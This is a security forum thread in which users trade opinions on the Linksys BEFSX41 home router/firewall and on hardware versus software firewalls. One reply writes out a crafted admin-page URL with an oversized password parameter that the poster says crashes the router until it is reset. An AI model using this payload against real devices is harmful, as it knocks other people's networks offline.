Router/Firewall
Page 1 of 2 12 LastLast

Thread: Router/Firewall

BS, EnCE, ACE, Cellebrite 11001001's Avatar
    Just West of Beantown, though nobody from Beantown actually calls it "Beantown."

Router/Firewall

Hey everyone-

My co-worker just picked up a
    "Linksys: BEFSX41 - Instant Broadband™EtherFast®Cable/DSL Firewall Router "
    and asked me about it.

I told him I have no experience with it, and I'd try and get some opinions of people who have had experience with it.

So, can anyone tell me about their experiences with this router/firewall?

Such as known vulnerabilities/exploits, what he needs to worry about, and if there really is a difference between this and a software router?

Thanks!
    That's Officer 11001001 to you...
    Now you see me | Now you don't
    "Relax, Bender; It was just a dream. There's no such thing as two." ~ Fry
    sometimes my computer goes down on me

I should think Linksys' knowledgebase articles that apply to that model of modem would be a good place to start looking for vulnerabilities and technical issues.
    Chris Shepherd
    The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
    \"Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?\" -- Failed Insult
    Is your whole family retarded, or did they just catch it from you?

Just West of Beantown, though nobody from Beantown actually calls it "Beantown."
    Thanks for the link, chsh.

But I guess I wasn't clear. I was looking for some insight from people who've had practical experience with it, and what those experiences were.

Here's some practical experience, try going here

Code:
    http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    &sysPasswdConfirm=AAAAAAAA
    &UPnP_Work=1&FactoryDefaults=0
    when behind the linksys router. It will kill the router and require you to reset the firmware to the defaults by unplugging it and holding the reset button for five seconds.

My opinion on linksys routers, great for small home networks where security is not too important and there is not much at stake. If all that he does is browse the interenet and check his mail from two machines, this router will be fine.

Okay..

My personal experience is that Linksys offers cookie cutter home network quality product(s).
    Its cheap and although not commercial quality in performance and features, will do the job. No QOS or true ACL worth speaking of.

Which software router were you speaking of? Most software based routers are PC HDD based which is not a great choice if reducing possible point if failures is an issue.

Passing specific vuln info is a nono to me but im sure a little research at the darker sites will net you some interesting info.

Anything in particular you are looking to learn about them? "Generally Speaking" types of questions are tough when trying to be pithy...

Thanks for your help everyone.

I'm not trying to be a pain in the ass, I've seen my fair share of them

I'm just trying to pacify his concerns. I told him that what he bought would be fine for his needs, but he wanted to hear more.

ss2chef - He was previously using ZoneAlarm, and was complaining that he was constantly getting communication notifications. This was one of the main reasons he went for a harware router.

as far as basic functionality goes, the router works nicely for basic home users, it provides security at an affordable price. i have set 2 or 3 of these up for people, and they havn't had any problems as far as security issues goes since i put them in

ss2chef - He was previously using ZoneAlarm, and was complaining that he was constantly getting communication notifications. This was one of the main reasons he went for a harware router. [/B]
    Cool...

You do mean firewall right?

When you say router I start thinking winroute pro or (holding breath) RRAS...

AO Ancient: Team Leader
    Tell your friend that I like them sufficiently for home users that it is mandated by policy in my company that any user requiring VPN access to the company network from a high speed network must have a Linksys, D-Link or whatever in place prior to to access being granted. I also insist they use the Cleaner, AdAware, Spybot and then install WinPatrol before the connection is granted and have CD's with the installation programs and instructions jsut for them to borrow.

It keeps the dross out......
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

quite impressive tiger shark, sounds like you run a good network program there.
    Everyone is going to die, I am just as good of a reason as any.

http://think-smarter.blogspot.com